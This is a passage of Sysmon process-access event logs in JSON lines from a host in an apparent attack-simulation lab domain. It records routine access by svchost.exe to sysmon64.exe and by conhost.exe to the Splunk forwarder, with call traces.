05:48:43.356","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3398,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.356\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.356","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3399,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.356\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.356","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3400,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.356\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.356","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3401,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.356\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.356","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3402,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.356\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.356","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3403,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.356\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.356","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3404,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.356\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.356","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3405,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.356\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-023B-5F25-0000-001053400500}\r\nTargetProcessId: 4420\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.356","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-023B-5F25-0000-001053400500}","TargetProcessId":"4420","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
